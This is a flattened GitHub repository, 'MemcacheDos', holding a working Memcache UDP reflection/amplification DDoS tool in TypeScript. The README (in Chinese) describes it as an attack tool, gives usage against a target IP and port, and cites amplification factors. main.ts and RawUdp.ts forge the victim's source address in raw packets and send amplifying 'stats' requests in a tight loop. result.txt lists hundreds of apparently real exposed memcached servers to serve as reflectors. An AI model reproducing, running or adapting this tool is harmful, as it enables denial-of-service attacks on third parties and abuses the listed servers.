Repository: Srar/MemcacheDos Branch: master Commit: 7f87b1f614f4 Files: 10 Total size: 13.9 KB Directory structure: gitextract_bk56ggzy/ ├── .gitignore ├── PacketUtils.ts ├── PacketsStruct.ts ├── README.md ├── RawUdp.ts ├── formatter/ │ ├── IpPacketFormatter.ts │ └── UdpPacketFormatter.ts ├── main.ts ├── package.json └── result.txt ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ # Logs logs *.log npm-debug.log* yarn-debug.log* yarn-error.log* # Runtime data pids *.pid *.seed *.pid.lock # Directory for instrumented libs generated by jscoverage/JSCover lib-cov # Coverage directory used by tools like istanbul coverage # nyc test coverage .nyc_output # Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files) .grunt # Bower dependency directory (https://bower.io/) bower_components # node-waf configuration .lock-wscript # Compiled binary addons (https://nodejs.org/api/addons.html) build/Release # Dependency directories node_modules/ jspm_packages/ # Typescript v1 declaration files typings/ # Optional npm cache directory .npm # Optional eslint cache .eslintcache # Optional REPL history .node_repl_history # Output of 'npm pack' *.tgz # Yarn Integrity file .yarn-integrity # dotenv environment variables file .env # next.js build output .next memcache.js chinaip.txt list.js local.js scan.js ================================================ FILE: PacketUtils.ts ================================================ export default { isBroadCast: function (bufs): boolean { for (var i = 0; i < 6; i++) { if (bufs[i] != 0xff) { return false; } } return true; }, isARP: function (bufs): boolean { return bufs[12] == 0x08 && bufs[13] == 0x06 }, isIPv4: function (bufs): boolean { return bufs[12] === 0x08 && bufs[13] === 0x00; }, isTCP: function (bufs): boolean { return bufs[23] === 0x06; }, isIGMP: function (bufs): boolean { return bufs[23] === 0x02; }, inetAddr: function (ip) { var nip = ip.split(".").map(function (item) { return parseInt(item); }) var bufs = Buffer.from(nip); return bufs.readUInt32LE(0); }, inetNtoa: function (number) { var bufs = new Buffer(4); bufs.writeUInt32BE(number, 0); return `${bufs[3].toString(10)}.${bufs[2].toString(10)}.${bufs[1].toString(10)}.${bufs[0].toString(10)}`; }, stringToIpAddress: function (ip): Buffer { var nip = ip.split(".").map(function (item) { return parseInt(item); }) return Buffer.from(nip); }, ipAddressToString: function (bufs) { return `${bufs[0].toString(10)}.${bufs[1].toString(10)}.${bufs[2].toString(10)}.${bufs[3].toString(10)}`; } } ================================================ FILE: PacketsStruct.ts ================================================ export enum EthernetType { ARP, IPv4, IPv6, } export interface BasePacket { sourceAddress?: Buffer, destinaltionAddress?: Buffer, type?: EthernetType, } export interface ArpPacket extends BasePacket { hardwareType: Buffer, protocolType: Buffer, hardwareSize: Buffer, protocalSize: Buffer, opCode: Buffer, senderMacAddress: Buffer, senderIpAdress: Buffer, targetMacAddress: Buffer, targetIpAddeess: Buffer, } export enum IpProtocol { IPv6HopByHop = 0, ICMPv4 = 1, IGMP = 2, IPv4 = 4, TCP = 6, UDP = 17, RUDP = 27, IPv6 = 41, IPv6Routing = 43, IPv6Fragment = 44, GRE = 47, ESP = 50, AH = 51, ICMPv6 = 58, NoNextHeader = 59, IPv6Destination = 60, IPIP = 94, EtherIP = 97, SCTP = 132, UDPLite = 136, MPLSInIP = 137, IPv4_PSEUDO_LENGTH = 12 } export interface IpPacket extends BasePacket { version?: number, ipHeaderLength?: number, TOS?: number, totalLength?: number, identification?: number, flags?: number, fragOffset?: number, TTL?: number, protocol?: IpProtocol, checksum?: number, sourceIp?: Buffer, destinationIp?: Buffer } export interface TcpPacket extends IpPacket { sourcePort?: number, destinationPort?: number, sequenceNumber?: number, acknowledgmentNumber?: number, tcpHeaderLength?: number, FIN?: boolean, SYN?: boolean, RST?: boolean, PSH?: boolean, ACK?: boolean, URG?: boolean, ECE?: boolean, CWR?: boolean, NS?: boolean, window?: number, checksum?: number, urgent?: number, options?: Buffer, payload?: Buffer, } export interface UdpPacket extends IpPacket { sourcePort?: number, destinationPort?: number, totalLength: number, payload: Buffer } ================================================ FILE: README.md ================================================ # MemcacheDos Memcache 反射攻击. # 如何使用 ``` git clone https://github.com/Srar/MemcacheDos.git cd MemcacheDos npm install ./node_modules/.bin/ts-node main.ts --list result.txt --ip 1.1.1.1 --port 80 ``` # Q&A * 测试平台 > CentOS7, nodejs v6.12.3 yum安装 * `npm install`安装`raw-socket`时出现错误 > 使用`npm install --unsafe` * 反射无效果 > 机房已经拦截了伪造IP的数据包 * 反射倍率 > 目前反射倍率60倍. 可以自行先`set`一段较大的数据, 再使用此数据来反射, 据说倍率可以到4w倍. > 全部issues不作回答. # 相关新闻 * [Memcrashed - Major amplification attacks from UDP port 11211](https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/) * [利用 Memcache 作为 DRDoS 反射放大器进行 DDoS 攻击](https://cert.360.cn/warning/detail?id=c63eb87058834e37c7c112c35ef5f9fd) ================================================ FILE: RawUdp.ts ================================================ import * as raw from "raw-socket" import UdpPacketFormatter from "./formatter/UdpPacketFormatter" export default class RawUdp { private socket: any; constructor() { this.socket = raw.createSocket({ protocol: raw.Protocol.UDP }); this.socket.setOption(raw.SocketLevel.IPPROTO_IP, raw.SocketOption.IP_HDRINCL, new Buffer([0x00, 0x00, 0x00, 0x01]), 4); } send(sourceIP: Buffer, sourcePort: number, targetIP: Buffer, targetPort: number, data: Buffer): Promise { return new Promise(function (reslove, reject) { var buffer = UdpPacketFormatter.build({ version: 4, TTL: 64, protocol: 17, sourceIp: sourceIP, destinationIp: targetIP, sourcePort: sourcePort, destinationPort: targetPort, totalLength: 28 + data.length, identification: 13858, TOS: 0, flags: 0, payload: data }); this.socket.send(buffer, 0, buffer.length, "1.1.1.1", function (error, bytes) { error ? reject(error) : reslove(bytes); }); }.bind(this)) } } ================================================ FILE: formatter/IpPacketFormatter.ts ================================================ import { BasePacket, IpPacket, TcpPacket, UdpPacket, } from "../PacketsStruct" import PacketUtils from "../PacketUtils" export default class IpPacketFormatter { static build(obj: IpPacket): Buffer { // unsupport ipv6 address. var ipPacketBuffer: Buffer = Buffer.allocUnsafe(20); ipPacketBuffer[0] = (obj.version << 4) | (20 / 4); ipPacketBuffer[1] = obj.TOS; // set ip packet total length. ipPacketBuffer.writeUInt16BE(obj.totalLength, 2); try { ipPacketBuffer.writeUInt16BE(obj.identification, 4); } catch (error) { console.log(obj.identification); } ipPacketBuffer.writeUInt16BE(obj.identification, 4); // flags ipPacketBuffer[6] = obj.flags == undefined ? 0x40 : obj.flags; // fragOffset ipPacketBuffer[7] = 0x00 // time to live. ipPacketBuffer[8] = obj.TTL; ipPacketBuffer[9] = obj.protocol; // for computing checksum. ipPacketBuffer.writeUInt16BE(0, 10); obj.sourceIp.copy(ipPacketBuffer, 12); obj.destinationIp.copy(ipPacketBuffer, 16); ipPacketBuffer.writeUInt16BE(IpPacketFormatter.checksum(ipPacketBuffer), 10); return ipPacketBuffer; } // from https://stackoverflow.com/questions/8269693/crc-checking-done-automatically-on-tcp-ip static checksum(bufs): number { var length: number = bufs.length; var i: number = 0; var sum: number = 0; var data: number; // Handle all pairs while (length > 1) { // Corrected to include @Andy's edits and various comments on Stack Overflow data = (((bufs[i] << 8) & 0xFF00) | ((bufs[i + 1]) & 0xFF)); sum += data; // 1's complement carry bit correction in 16-bits (detecting sign extension) if ((sum & 0xFFFF0000) > 0) { sum = sum & 0xFFFF; sum += 1; } i += 2; length -= 2; } // Handle remaining byte in odd length buffers if (length > 0) { // Corrected to include @Andy's edits and various comments on Stack Overflow sum += (bufs[i] << 8 & 0xFF00); // 1's complement carry bit correction in 16-bits (detecting sign extension) if ((sum & 0xFFFF0000) > 0) { sum = sum & 0xFFFF; sum += 1; } } // Final 1's complement value correction to 16-bits sum = ~sum; sum = sum & 0xFFFF; return sum; } } ================================================ FILE: formatter/UdpPacketFormatter.ts ================================================ import { BasePacket, IpPacket, TcpPacket, UdpPacket, } from "../PacketsStruct" import PacketUtils from "../PacketUtils" import IpPacketFormatter from "./IpPacketFormatter" export default class UdpPacketFormatter extends IpPacketFormatter { static build(obj: UdpPacket): Buffer { var udpPacketBuffer = Buffer.allocUnsafe(8); udpPacketBuffer.writeUInt16BE(obj.sourcePort, 0); udpPacketBuffer.writeUInt16BE(obj.destinationPort, 2); udpPacketBuffer.writeUInt16BE(udpPacketBuffer.length + obj.payload.length, 4); udpPacketBuffer.writeUInt16BE(0, 6); udpPacketBuffer = Buffer.concat([udpPacketBuffer, obj.payload]); var udpPacketTotalLength = Buffer.allocUnsafe(2); udpPacketTotalLength.writeUInt16BE(udpPacketBuffer.length, 0); udpPacketBuffer.writeUInt16BE(super.checksum( Buffer.concat([ obj.sourceIp, obj.destinationIp, new Buffer([0x00, obj.protocol]), udpPacketTotalLength, udpPacketBuffer ]) ), 6); return Buffer.concat([ super.build(obj), udpPacketBuffer ]); } } ================================================ FILE: main.ts ================================================ import * as fs from "fs" import PacketUtils from "./PacketUtils" import RawUdp from "./RawUdp" const argv = require("optimist") .usage("Usage: $0 --list [memcache server list file] --ip [target ip] --port [target port]") .demand(["list", "ip", "port"]) .argv; function attack() { var command = Buffer.from("stats\r\nstats\r\nstats\r\nstats items\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\nstats\r\n"); var buffer = new Buffer(8); buffer.writeUInt16BE(0, 0); buffer.writeUInt16BE(0, 2); buffer.writeUInt16BE(1, 4); buffer.writeUInt16BE(0, 6); buffer = Buffer.concat([buffer, command]); var rawUdp = new RawUdp(); return function (sourceIP: string, sourcePort: number, targetIP: string, targetPort: number) { var sip = PacketUtils.stringToIpAddress(sourceIP); var dip = PacketUtils.stringToIpAddress(targetIP); rawUdp.send(sip, sourcePort, dip, targetPort, buffer); } } var sendAttackPacket = attack(); var list = fs.readFileSync(argv.list).toString().split("\n"); function loop() { for (const ip of list) { sendAttackPacket(argv.ip, argv.port, ip, 11211) } setTimeout(loop, 15); } loop(); ================================================ FILE: package.json ================================================ { "name": "rawsocks", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "keywords": [], "author": "", "license": "ISC", "dependencies": { "@types/node": "^9.4.6", "optimist": "^0.6.1", "raw-socket": "^1.5.2", "ts-node": "^5.0.0", "typescript": "^2.7.2" } } ================================================ FILE: result.txt ================================================ 1.85.30.138 1.25.201.226 1.30.233.82 1.202.176.102 14.17.86.46 14.23.100.197 1.60.17.28 14.18.154.27 14.17.88.47 1.195.29.15 1.192.90.228 1.196.143.203 14.152.92.27 14.115.185.163 46.31.44.199 1.119.44.99 14.125.99.128 14.157.104.191 14.152.92.26 14.152.78.151 14.215.112.54 14.105.38.237 14.105.38.237 27.156.68.230 27.115.89.150 14.215.113.57 27.154.238.54 14.215.113.182 27.115.41.165 27.154.59.58 27.154.34.34 27.22.104.75:10784 27.152.221.80 27.152.221.80 27.17.49.146:2177 14.215.225.236 14.204.74.6 14.204.200.149 36.33.1.78 112.29.174.205 27.191.150.105 59.56.110.217 36.110.10.2 117.27.151.226 39.106.123.12 39.107.109.230 42.121.4.205 39.106.251.186 39.106.251.186 39.107.32.47 39.106.112.187 39.107.102.70 39.106.254.182 39.106.254.182 39.106.154.21 39.107.116.178 39.107.12.240 39.107.60.151 39.107.60.151 39.106.223.156 39.106.223.156 39.108.68.224 39.107.155.113 42.120.48.59 39.106.73.250 39.108.69.40 39.108.84.187 39.108.194.233 39.108.195.10 39.108.195.10 39.108.195.219 39.108.12.240 39.108.141.167 39.104.108.136 39.108.163.113 39.108.136.167 39.108.7.16 39.108.120.159 42.121.7.98 39.108.245.50 39.108.93.147 39.108.58.142 39.108.8.223 39.108.7.119 39.82.25.99 39.108.55.232 39.108.219.154 39.108.64.242 39.108.221.176 39.104.79.117 42.120.22.232 36.7.69.18 42.121.236.117 42.121.5.26 39.108.193.71 39.108.215.53 39.104.56.143 42.62.90.146 117.25.143.114 42.121.2.131 42.121.1.166 42.62.2.73 42.120.4.67 42.62.109.141 39.108.64.19 39.108.107.194 39.106.213.51 39.106.54.195 39.106.41.187 39.107.80.101 39.106.196.169 42.121.125.149 39.106.216.173 42.121.58.100 42.96.139.80 39.106.31.53 42.96.171.1 39.107.58.197 39.107.58.197 42.120.17.238 39.80.139.64 42.96.193.241 42.51.29.155 42.121.123.209 42.51.239.2 39.104.78.84 42.51.206.185 42.96.206.18 42.121.96.52 42.121.123.199 42.96.190.92 39.108.188.105 42.121.19.219 42.121.120.128 39.108.195.25 42.96.196.117 42.121.6.118 42.51.41.156 39.108.244.204 42.121.192.136 42.121.35.68 39.108.50.44 42.51.33.180 39.108.132.202 39.108.65.36 39.108.112.90 40.125.162.234 39.108.165.218 39.108.103.105 39.108.162.149 39.108.115.80 42.62.5.6 39.108.126.195 39.108.12.247 39.108.69.249 39.108.51.109 39.108.63.83 39.108.8.178 42.96.199.157 39.108.81.11 39.108.50.144 39.108.6.26 42.51.215.8 42.51.201.110 42.123.84.42 39.108.65.185 42.51.201.244 42.121.123.129 42.96.135.97 42.96.152.253 42.51.44.250 42.51.215.8 42.96.167.212 42.121.57.69 42.121.105.77 42.121.67.135 42.51.16.21 42.96.139.120 42.96.196.31 42.62.25.75 42.62.112.76 42.96.177.100 218.60.56.53 42.51.130.20 42.51.201.109 42.121.111.127 42.123.125.135 42.51.42.146 42.51.205.126 36.189.239.121 42.202.130.244 42.120.7.26 42.121.17.163 42.120.7.203 42.121.192.88 42.121.65.17 14.23.151.195